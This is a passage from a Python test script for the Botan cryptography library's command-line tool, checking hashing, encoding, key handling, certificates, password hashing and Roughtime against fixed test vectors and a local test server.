if len(output) < 500: logging.error("Help output seems very short") def cli_version_tests(_tmp_dir): output = test_cli("version", None, None) version_re = re.compile(r'[0-9]\.[0-9]+\.[0-9]') if not version_re.match(output): logging.error("Unexpected version output %s" % (output)) output = test_cli("version", ["--full"], None, None) version_full_re = re.compile(r'Botan [0-9]\.[0-9]+\.[0-9] \(.* revision .*, distribution .*\)') if not version_full_re.match(output): logging.error("Unexpected version output %s" % (output)) def cli_is_prime_tests(_tmp_dir): test_cli("is_prime", "5", "5 is probably prime") test_cli("is_prime", "9", "9 is composite") test_cli("is_prime", "548950623407687320763", "548950623407687320763 is probably prime") def cli_gen_prime_tests(_tmp_dir): test_cli("gen_prime", "64", "15568813029901363163") test_cli("gen_prime", "128", "287193909494025008847286845478788766073") def cli_entropy_tests(_tmp_dir): output = test_cli("entropy", ["all"], None) status_re = re.compile('Polling [a-z0-9_]+ gathered [0-9]+ bytes in [0-9]+ outputs with estimated entropy [0-9]+') unavail_re = re.compile('Source [a-z0-9_]+ is unavailable') comp_re = re.compile('Sample from [a-z0-9_]+ was .* compressed from [0-9]+ bytes to [0-9]+ bytes') output_re = re.compile(r'[A-F0-9]+(...)?') status_next = True for line in output.split('\n'): if comp_re.match(line): continue if status_next: if status_re.match(line) is not None: status_next = False elif unavail_re.match(line) is not None: pass else: logging.error('Unexpected status line %s', line) status_next = False else: if output_re.match(line) is None: logging.error('Unexpected sample line %s', line) status_next = True def cli_factor_tests(_tmp_dir): test_cli("factor", "97", "97: 97") test_cli("factor", "9753893489562389", "9753893489562389: 21433 455087644733") test_cli("factor", "12019502040659149507", "12019502040659149507: 3298628633 3643787579") def cli_mod_inverse_tests(_tmp_dir): test_cli("mod_inverse", "97 802", "339") test_cli("mod_inverse", "98 802", "0") def cli_base64_tests(_tmp_dir): test_cli("base64_enc", "-", "YmVlcyE=", "bees!") test_cli("base64_dec", "-", "bees!", "YmVlcyE=") def cli_base32_tests(_tmp_dir): test_cli("base32_enc", "-", "MJSWK4ZB", "bees!") test_cli("base32_dec", "-", "bees!", "MJSWK4ZB") def cli_base58_tests(_tmp_dir): test_cli("base58_enc", "-", "C6sRAr4", "bees!") test_cli("base58_dec", "-", "bees!", "C6sRAr4") test_cli("base58_enc", ["--check", "-"], "Cjv15cdjaBc", "F00F") test_cli("base58_dec", ["--check", "-"], "F00F", "Cjv15cdjaBc") def cli_hex_tests(_tmp_dir): test_cli("hex_enc", "-", "6265657321", "bees!") test_cli("hex_dec", "-", "bees!", "6265657321") def cli_hash_tests(_tmp_dir): test_cli("hash", "--algo=SHA-256", "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 -", "") test_cli("hash", "--algo=SHA-256", "BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD -", "abc") test_cli("hash", ["--algo=SHA-256", "--format=base64"], "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= -", "abc") test_cli("hash", ["--algo=SHA-224", "--format=base58", "--no-fsname"], "MuGc8HkSVyJjfMjPM5UQikPToBTzNucEghcGLe", "abc") test_cli("hash", ["--algo=SHA-224", "--format=base58check", "--no-fsname"], "3MmfMqgrhemdVa9bDAGfooukbviWtKMBx2xauL2RsyAe", "abc") def cli_hmac_tests(tmp_dir): key_file = os.path.join(tmp_dir, 'hmac.key') test_cli("rng", ["64", "--output=%s" % (key_file)], "") test_cli("hmac", ["--no-fsname", "--hash=SHA-384", key_file, key_file], 
"E3A8529377030B28A7DBDFC50DDEC8E4ECEFB6EA850D95EB785938CD3E3AFEF9EF8B08AF219C1496633193468AB755CB") def cli_bcrypt_tests(_tmp_dir): test_cli("gen_bcrypt", "--work-factor=4 s3kr1t", "$2a$04$0.8G7o08XYwvBBWA3l0WUujtwoGZgGDzVSN8fNkNqXikcK4A3lHPS") test_cli("check_bcrypt", "s3kr1t $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka", "Password is valid") test_cli("check_bcrypt", "santa $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka", "Password is NOT valid") def cli_argon2_tests(_tmp_dir): password = "s3kr1t" expected = "$argon2id$v=19$m=8,t=1,p=1$2A+I9q2+ZayxDDYC5n2YWw$/Lhx+Jbtlpw+Kxpskfv7+AKhBL/5ebalTJkVC1O5+1E" test_cli("gen_argon2", ['--mem=8', password], expected) test_cli("gen_argon2", ['--mem=8', '--t=1', password], expected) test_cli("gen_argon2", ['--mem=8', '--t=1', '--p=1', password], expected) test_cli("check_argon2", [password, expected], "Password is valid") test_cli("check_argon2", ["guessing", expected], "Password is NOT valid") def cli_gen_dl_group_tests(_tmp_dir): pem = """-----BEGIN X9.42 DH PARAMETERS----- MIIBJAKBgwVcMHlFVo64S86Y5KrlClZrIibOQ6iKm8Ih3Eb53XoQiSc33GtilRmP f7qKIVI86meoJHVU7gtaJk82yAYk6BksmZn0eXvUU7zD8yF/yH3yym0SfI0eH1OC 2+esfGblePpHCtt5uO56pzIqCIpOq+8gTG7JbFHJvTb8nwmAWFLZvjepAoGDBHOP e5A/RNyeXz+16+7Jjh4QOXWo/c6kM0WrIHgFbaIkupRndG5bcy8aCjsbgiIpeWy1 aNDURFB3UR3q1Si0gA7cvirDOH7lnN3C9zeohq+VPy5L7S3gKLGB1HXY/r2qLKhM 6ziphMYZxtr+XhsbxbA/+MuNoP/He+kwlGLtDKiBdF4CFjgPiPatvmWssQw2AuZ9 mFvAZ/8wal0= -----END X9.42 DH PARAMETERS-----""" test_cli("gen_dl_group", "--pbits=1043", pem) dsa_grp = """-----BEGIN X9.42 DH PARAMETERS----- MIIBHgKBgQCyP1vosC/axliM2hmJ9EOSdd1zBkuzMP25CYD8PFkRVrPLr1ClSUtn eXTIsHToJ7d7sRwtidQGW9BrvUEyiAWE06W/wnLPxB3/g2/l/P2EhbNmNHAO7rV7 ZVz/uKR4Xcvzxg9uk5MpT1VsxA8H6VEwzefNF1Rya92rqGgBTNT3/wKBgC7HLL8A Gu3tqJxTk1iNgojjOiSreLn6ihA8R8kQnRXDTNtDKz996KHGInfMBurUI1zPM3xq bHc0CvU1Nf87enhPIretzJcFgiCWrNFUIC25zPEjp0s3/ERHT4Bi1TABZ3j6YUEQ fnnj+9XriKKHf2WtX0T4FXorvnKq30m934rzAhUAvwhWDK3yZEmphc7dwl4/J3Zp +MU= -----END X9.42 DH PARAMETERS-----""" test_cli("gen_dl_group", ["--type=dsa", "--pbits=1024"], dsa_grp) def cli_key_tests(tmp_dir): pem = """-----BEGIN PRIVATE KEY----- MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQg2A+I9q2+ZayxDDYC5n2Y W8Bn/zBm4D3mwS5qMwADRDehRANCAATwnDFqsjXL9SD/Rr1Vy4pb79PswXdQNZBN mlLtJ5JvZ0/p6zP3x+Y9yPIrAR8L/acG5ItSrAKXzzuqQQZMv4aN -----END PRIVATE KEY-----""" priv_key = os.path.join(tmp_dir, 'priv.pem') pub_key = os.path.join(tmp_dir, 'pub.pem') pub_der_key = os.path.join(tmp_dir, 'pub.der') enc_pem = os.path.join(tmp_dir, 'priv_enc.pem') enc_der = os.path.join(tmp_dir, 'priv_enc.der') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') user_cert = os.path.join(tmp_dir, 'user.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp256k1"], pem) test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "") test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "") test_cli("pkcs8", "--pub-out --der-out --output=%s %s" % (pub_der_key, priv_key), "") test_cli("pkcs8", "--pass-out=foof --der-out --output=%s %s" % (enc_der, priv_key), "") test_cli("pkcs8", "--pass-out=foof --output=%s %s" % (enc_pem, priv_key), "") dec_pem = test_cli("pkcs8", ["--pass-in=foof", enc_pem], None) dec_der = test_cli("pkcs8", ["--pass-in=foof", enc_der], None) if dec_pem != dec_der: logging.error("Problem decrypting PKCS8 key") test_cli("fingerprint", ['--no-fsname', pub_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") 
test_cli("fingerprint", ['--no-fsname', pub_der_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", ['--no-fsname', pub_key, pub_der_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4\n" "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", [pub_der_key], pub_der_key + ": 83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", ['-'], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4", open(pub_key, 'rb').read().decode()) valid_sig = "nI4mI1ec14Y7nYUWs2edysAVvkob0TWpmGh5rrYWDA+/W9Fj0ZM21qJw8qa3/avAOIVBO6hoMEVmfJYXlS+ReA==" test_cli("sign", "--provider=base %s %s" % (priv_key, pub_key), valid_sig) test_cli("verify", [pub_key, pub_key, '-'], "Signature is valid", valid_sig) test_cli("verify", [pub_key, pub_key, '-'], "Signature is invalid", valid_sig.replace("G", "H")) test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust") cert_info = test_cli("cert_info", ['--fingerprint', ca_cert], None) if cert_info.find('Subject: CN="CA",C="VT"') < 0: logging.error('Unexpected output for cert_info command %s', cert_info) if cert_info.find('Subject keyid: 69DD911C9EEE3400C67CBC3F3056CBE711BD56AF9495013F') < 0: logging.error('Unexpected output for cert_info command %s', cert_info) test_cli("gen_pkcs10", "%s User --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, user_cert)) test_cli("cert_verify", [user_cert, ca_cert], "Certificate passes validation checks") test_cli("cert_verify", user_cert, "Certificate did not validate - Certificate issuer not found") def cli_xmss_sign_tests(tmp_dir): priv_key = os.path.join(tmp_dir, 'priv.pem') pub_key = os.path.join(tmp_dir, 'pub.pem') pub_key2 = os.path.join(tmp_dir, 'pub2.pem') msg = os.path.join(tmp_dir, 'input') sig1 = os.path.join(tmp_dir, 'sig1') sig2 = os.path.join(tmp_dir, 'sig2') test_cli("rng", ['--output=%s' % (msg)], "") test_cli("hash", ["--no-fsname", msg], "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855") test_cli("keygen", ["--algo=XMSS", "--output=%s" % (priv_key)], "") test_cli("hash", ["--no-fsname", priv_key], "5B38F737BA41BE7F40433DB30EAEF7C41ABB0F7D9E7A09DEB5FDCE7B6811693F") test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "") test_cli("fingerprint", ['--no-fsname', pub_key], "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22") # verify the key is updated after each signature: test_cli("sign", [priv_key, msg, "--output=%s" % (sig1)], "") test_cli("verify", [pub_key, msg, sig1], "Signature is valid") test_cli("hash", ["--no-fsname", sig1], "04AF45451C7A9AF2D828E1AD6EC262E012436F4087C5DA6F32C689D781E597D0") test_cli("hash", ["--no-fsname", priv_key], "67929FAEC636E43DE828C1CD7E2D11CE7C3388CE90DD0A0F687C6627FFA850CD") test_cli("sign", [priv_key, msg, "--output=%s" % (sig2)], "") test_cli("verify", [pub_key, msg, sig2], "Signature is valid") test_cli("hash", ["--no-fsname", sig2], "0785A6AD54CC7D01F2BE2BC6463A3EAA1159792E52210ED754992C5068E8F24F") test_cli("hash", ["--no-fsname", priv_key], 
"1940945D68B1CF54D79E05DD7913A4D0B4959183F1E12B81A4E43EF4E63FBD20") # private key updates, public key is unchanged: test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key2, priv_key), "") test_cli("fingerprint", ['--no-fsname', pub_key2], "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22") def cli_pbkdf_tune_tests(_tmp_dir): if not check_for_command("pbkdf_tune"): return expected = re.compile(r'For (default|[1-9][0-9]*) ms selected Scrypt\([0-9]+,[0-9]+,[0-9]+\) using [0-9]+ MiB') output = test_cli("pbkdf_tune", ["--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected.match(line) is None: logging.error("Unexpected line '%s'" % (line)) expected_pbkdf2 = re.compile(r'For (default|[1-9][0-9]*) ms selected PBKDF2\(HMAC\(SHA-256\),[0-9]+\)') output = test_cli("pbkdf_tune", ["--algo=PBKDF2(SHA-256)", "--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected_pbkdf2.match(line) is None: logging.error("Unexpected line '%s'" % (line)) expected_argon2 = re.compile(r'For (default|[1-9][0-9]*) ms selected Argon2id\([0-9]+,[0-9]+,[0-9]+\)') output = test_cli("pbkdf_tune", ["--algo=Argon2id", "--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected_argon2.match(line) is None: logging.error("Unexpected line '%s'" % (line)) def cli_psk_db_tests(tmp_dir): if not check_for_command("psk_get"): return psk_db = os.path.join(tmp_dir, 'psk.db') db_key1 = "909"*32 db_key2 = "451"*32 test_cli("psk_set", [psk_db, db_key1, "name", "F00FEE"], "") test_cli("psk_set", [psk_db, db_key2, "name", "C00FEE11"], "") test_cli("psk_set", [psk_db, db_key1, "name2", "50051029"], "") test_cli("psk_get", [psk_db, db_key1, "name"], "F00FEE") test_cli("psk_get", [psk_db, db_key2, "name"], "C00FEE11") test_cli("psk_list", [psk_db, db_key1], "name\nname2") test_cli("psk_list", [psk_db, db_key2], "name") def cli_compress_tests(tmp_dir): if not check_for_command("compress"): return input_file = os.path.join(tmp_dir, 'input.txt') output_file = os.path.join(tmp_dir, 'input.txt.gz') with open(input_file, 'w') as f: f.write("hi there") f.close() test_cli("compress", input_file) if not os.access(output_file, os.R_OK): logging.error("Compression did not created expected output file") is_py3 = sys.version_info[0] == 3 output_hdr = open(output_file, 'rb').read(2) if is_py3: if output_hdr[0] != 0x1F or output_hdr[1] != 0x8B: logging.error("Did not see expected gzip header") else: if ord(output_hdr[0]) != 0x1F or ord(output_hdr[1]) != 0x8B: logging.error("Did not see expected gzip header") os.unlink(input_file) test_cli("decompress", output_file) if not os.access(input_file, os.R_OK): logging.error("Decompression did not created expected output file") recovered = open(input_file).read() if recovered != "hi there": logging.error("Decompression did not recover original input") def cli_rng_tests(_tmp_dir): test_cli("rng", "10", "D80F88F6ADBE65ACB10C") test_cli("rng", "16", "D80F88F6ADBE65ACB10C3602E67D985B") test_cli("rng", "10 6", "D80F88F6ADBE65ACB10C\n1B119CC068AF") test_cli("rng", ['--format=base64', '10'], "2A+I9q2+ZayxDA==") test_cli("rng", ['--format=base58', '10'], "D93XRyVfxqs7oR") test_cli("rng", ['--format=base58check', '10'], "2NS1jYUq92TyGFVnhVLa") hex_10 = re.compile('[A-F0-9]{20}') for rng in ['system', 'auto', 'entropy']: output = test_cli("rng", ["10", '--%s' % (rng)], use_drbg=False) if output == "D80F88F6ADBE65ACB10C": logging.error('RNG produced DRBG output') if hex_10.match(output) is 
None: logging.error('Unexpected RNG output %s' % (output)) has_rdrand = test_cli("cpuid", []).find(' rdrand ') > 0 if has_rdrand: output = test_cli("rng", ["10", '--rdrand'], use_drbg=False) if output == "D80F88F6ADBE65ACB10C": logging.error('RDRAND produced DRBG output') if hex_10.match(output) is None: logging.error('Unexpected RNG output %s' % (output)) def cli_roughtime_check_tests(tmp_dir): # pylint: disable=line-too-long if not check_for_command("roughtime_check"): return chain = os.path.join(tmp_dir, 'roughtime-chain') with open(chain, 'w') as f: f.write("""\ ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= uLeTON9D+2HqJMzK6sYWLNDEdtBl9t/9yw1cVAOm0/sONH5Oqdq9dVPkC9syjuWbglCiCPVF+FbOtcxCkrgMmA== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWOw1jl0uSiBEH9HE8/6r7zxoSc01f48vw+UzH8+VJoPelnvVJBj4lnH8uRLh5Aw0i4Du7XM1dp2u0r/I5PzhMQoDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AUBo+tEqPBQC47l77to7ESFTVhlw1SC74P5ssx6gpuJ6eP+1916GuUiySGE/x3Fp0c3otUGAdsRQou5p9PDTeane/YEeVq4/8AgAAAEAAAABTSUcAREVMRe5T1ml8wHyWAcEtHP/U5Rg/jFXTEXOSglngSa4aI/CECVdy4ZNWeP6vv+2//ZW7lQsrWo7ZkXpvm9BdBONRSQIDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQpXlenV0OfVisvp9jDHXLw8vymZVK9Pgw9k6Edf8ZEhUgSGEc5jwUASHLvZE2PBQAAAAAA ed25519 etPaaIxcBMY1oUeGpwvPMCJMwlRVNxv51KK/tktoJTQ= U53wX99JzZwy4BXa9C6R04bPu4yqFB5w5/wTgG8Mw5wm+VLrY70ECxJ9ZHnpdHVHaLEU3aeLnQFZyZPRAEOCyw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWMh3mPWCCbOlX8xDWbU9qdfKoReJX/XLsivom8bJJYmcC7T03tyXrtWUheEJweHtg4qMgSyifQS1MjHJSy1jPAsDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Akxw/tEqPBQBfOsOuciR7jiAW5itQ39y8yVr/ZJmgMwvTjqaU4/wA05ZqG4RqoLdvDXh5bCNySL6LrrnBNSAHwn5COt0CItNuAgAAAEAAAABTSUcAREVMRVP3BIOzsZmuxqMi+ScIBPyKtzFfK7ZlPFNP0JrNwln2QYtAcQFIKywDdNAAL+n8i3dz1p99K50FJjCkCl2J6AMDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQKC/kZVdjiNT2NCSGfnpot4eqipyMFsyMjiIQmqqqXqQCAa245jwUAAGCgA56PBQAAAAAA ed25519 AW5uAoTSTDfG5NfY1bTh08GUnOqlRb+HVhbJ3ODJvsE= IcZcXFuaLKYYhWcK3sT/6PrVeXMmabCRbf9hvVfkMkqEW1PFL++ZnHJ1/m+G8azITxvktwsfP1YAOOxWdbf9XQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWL5DAl8GPNUQ/mSXl0tI4N9yZAO+PiXTodJOTDL+WU/x26iqgyyQRikSSocRMzAEVLDGasdyW19mVC6H/6vfXggDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Av/JAtEqPBQBIP346SHhCdDfughzeH+uYSbxngDYxqHzBDtZt0obUKrzxfRWzD1oR61B1reLvoPVCKSfzEngi/g1NSQjTrzNMAgAAAEAAAABTSUcAREVMRTQLLplQv0rN4p77Bo59qT8bbquV6MKSwILI/Tw2LLGo9noaZegUFmM+rNu1d1AVOEVQ01j6/2xDmBvp0d6MZgEDAAAAIAAAACgAAABQVUJLTUlOVE1BWFS4a1dYoIB5u/zkbR3sIteuhVrQkszzj+Gng9ywo6O9VgAAAAAAAAAA//////////8AAAAA ed25519 cj8GsiNlRkqiDElAeNMSBBMwrAl15hYPgX50+GWX/lA= Tsy82BBU2xxVqNe1ip11OyEGoKWhKoSggWjBmDTSBmKbTs7bPPCEidYc5TQ23sQUWe62G35fQOVU28q+Eq5uhQ== 
BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDAmi7zgXAqLgQXVfbjeqnUZRiXCZI64QIoAKFL83CQHbyXgB4cNwHfQ9mSg0hYxTp1M8QxOuzusnUpk05DIRwwDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AcOBCtEqPBQBhsr1mKOxxCf4VDFzAtYB4Nhs332AN1LrJU/8+VqktzfPd2R7awJHEVEWugvSvOrr+9d332mQObAkYfKfDtbSFAgAAAEAAAABTSUcAREVMRUjnhDvkIjFzTEYtgHOfMpRHtnNZj4P31RFtapkwzGjOtc93pYDd7zqQCw2AVcfbSnPqa8k26z96Q9fVRzq0pw8DAAAAIAAAACgAAABQVUJLTUlOVE1BWFR7qp2oerjpbN8Y23nUGARIlsgkodW4owH29ZKhxDMn8AAAAAAAAAAA//////////8AAAAA """) test_cli("roughtime_check", chain, """\ 1: UTC 2019-08-04T13:38:17 (+-1000000us) 2: UTC 2019-08-04T13:38:17 (+-1000000us) 3: UTC 2019-08-04T13:38:17 (+-1000000us) 4: UTC 2019-08-04T13:38:18 (+-1000000us) 5: UTC 2019-08-04T13:38:18 (+-1000000us)""") with open(chain, 'w') as f: f.write("ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA") test_cli("roughtime_check", [chain, "--raw-time"], "1: UTC 1564925897781286 (+-1000000us)") with open(chain, 'w') as f: f.write("ed25519 cbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA") test_cli("roughtime_check", chain, expected_stderr=b'Error: Roughtime Invalid signature or public key\n') def cli_roughtime_tests(tmp_dir): # pylint: disable=line-too-long # pylint: disable=too-many-locals import socket import base64 import threading if not check_for_command("roughtime"): return server_port = random_port_number() chain_file = os.path.join(tmp_dir, 'roughtime-chain') ecosystem = os.path.join(tmp_dir, 'ecosystem') def run_udp_server(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('127.0.0.1', server_port) sock.bind(server_address) while True: data, address = sock.recvfrom(4096) if data: if data != base64.b64decode(server_request): logging.error("unexpected request") sock.sendto(base64.b64decode(server_response), address) udp_thread = threading.Thread(target=run_udp_server) udp_thread.daemon = True udp_thread.start() chain = [ """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== 
BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA """, """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA """, """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= SbWKPilWYrt+1vgFU3jlxGNOH6I/1npX8wl+KoraN3S6VDsyM6EfCV+JPEK8BsNoM2VIpMcSdjcVna/GwXwZkg== 